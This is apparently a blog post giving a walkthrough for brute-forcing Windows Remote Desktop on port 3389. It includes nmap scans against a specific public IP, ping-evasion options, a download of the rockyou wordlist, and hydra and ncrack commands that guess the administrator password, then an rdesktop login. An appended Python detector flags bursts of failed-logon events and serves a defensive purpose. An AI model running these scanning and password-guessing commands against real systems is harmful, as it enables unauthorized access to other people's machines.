Brute-forcing Windows RDP - 泓源视野

Brute-forcing Windows RDP (3389)

Check the service with: nmap -sV --script=rdp-vuln-ms12-020 -p 3389 205.185.116.249 -Pn

If the TCP ACK ping scan above is blocked, either

sudo nmap -sn 172.17.0.2 --disable-arp-ping  or

sudo nmap -sP -PA 192.168.43.132 --disable-arp-ping

Use an ICMP echo ping to get around the blocked TCP ACK ping:

sudo nmap -sP -PE 192.168.43.132 --disable-arp-ping

Use an ICMP timestamp ping to get around a blocked ICMP echo:

sudo nmap -sP -PP 192.168.43.132 --disable-arp-ping

wget https://github.com/mishrasunny174/WordLists/raw/master/rockyou.tar.gz

tar -zxvf rockyou.tar.gz

RDP is the Remote Desktop Protocol.

  $ nmap your_target
  Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CST
  Nmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx)
  Host is up (0.28s latency).
  Not shown: 988 closed ports
  PORT      STATE    SERVICE
  135/tcp   filtered msrpc
  139/tcp   filtered netbios-ssn
  445/tcp   filtered microsoft-ds
  593/tcp   filtered http-rpc-epmap
  3389/tcp  open     ms-wbt-server   # this is the remote desktop port
  4444/tcp  filtered krb524
  6667/tcp  filtered irc
  49152/tcp open     unknown
  49153/tcp open     unknown
  49154/tcp open     unknown
  49155/tcp open     unknown
  49163/tcp open     unknown
  Nmap done: 1 IP address (1 host up) scanned in 28.14 seconds

Brute-forcing with hydra:

  hydra -t 4 -V -l administrator -P /root/rockyou.txt rdp://your_target
    -t = TASKS: run TASKS connects in parallel (per host, default: 16); for RDP set to a maximum of 4.
    -V = Verbose: shows you the attempted passwords.
    -l = Username
    -P = Password list
    rdp:// = Port 3389

Brute-forcing with ncrack:

  ncrack -p 3389 -v --user administrator -P /usr/share/wordlists/rockyou.txt 192.95.xx.xx
    -p = Port number
    -v = Verbose: shows you any found passwords in real time
    --user = Username
    -P = Password list
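Both tools above produce the same footprint on the target: a burst of failed logons from one source address. The following detector is an added example written for this post (not code from the original article or from hydra/ncrack); it assumes Windows Security Event ID 4625 records have been exported as (timestamp, source IP, account, logon type) tuples, and the sample events are constructed, not real logs.

```python
"""Flag RDP password guessing from Windows Security log failures.

A hydra/ncrack run against port 3389 shows up on the target as many
Event ID 4625 (failed logon) records from a single source IP in a short
time. The detector keeps a sliding window per source and alerts when the
failure count inside the window reaches a threshold.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of 4625 events: (timestamp, source IP, account, logon type).
# Logon type 10 = RemoteInteractive (RDP); type 3 appears when NLA is enabled.
SAMPLE_EVENTS = [
    ("2016-09-20T17:30:00", "203.0.113.7", "administrator", 10),
    ("2016-09-20T17:30:01", "203.0.113.7", "administrator", 10),
    ("2016-09-20T17:30:01", "203.0.113.7", "administrator", 10),
    ("2016-09-20T17:30:02", "203.0.113.7", "administrator", 10),
    ("2016-09-20T17:30:03", "203.0.113.7", "administrator", 10),
    ("2016-09-20T17:30:03", "203.0.113.7", "administrator", 10),
    ("2016-09-20T17:35:00", "192.0.2.15", "jdoe", 10),  # legitimate user, one typo
    ("2016-09-20T17:40:00", "192.0.2.15", "jdoe", 10),  # and another a while later
]


def detect_rdp_bruteforce(events, threshold=5, window_seconds=60):
    """Return {source_ip: timestamp} for each source whose failed RDP logons
    inside any window of window_seconds reach threshold (first hit only)."""
    recent = defaultdict(deque)  # source IP -> failure timestamps still in window
    alerts = {}
    window = timedelta(seconds=window_seconds)
    for ts, src, _account, logon_type in sorted(events):
        if logon_type not in (3, 10):  # ignore interactive/service/batch logons
            continue
        now = datetime.fromisoformat(ts)
        q = recent[src]
        q.append(now)
        while q and now - q[0] > window:  # evict failures older than the window
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = ts
    return alerts


if __name__ == "__main__":
    for ip, when in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(f"possible RDP brute force from {ip}, threshold reached at {when}")
```

Tune threshold and window to the environment: a fixed account with a high failure rate matches the hydra -l / ncrack --user usage shown above, while the sparse failures from 192.0.2.15 stay below the default threshold.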

Logging in over remote desktop:

  rdesktop your_target
This article was published by 泓源视野 author admin; its copyright belongs to 泓源视野. The content reflects the author's personal views and does not represent 泓源视野's endorsement of or support for those views. For reposting, please cite the source.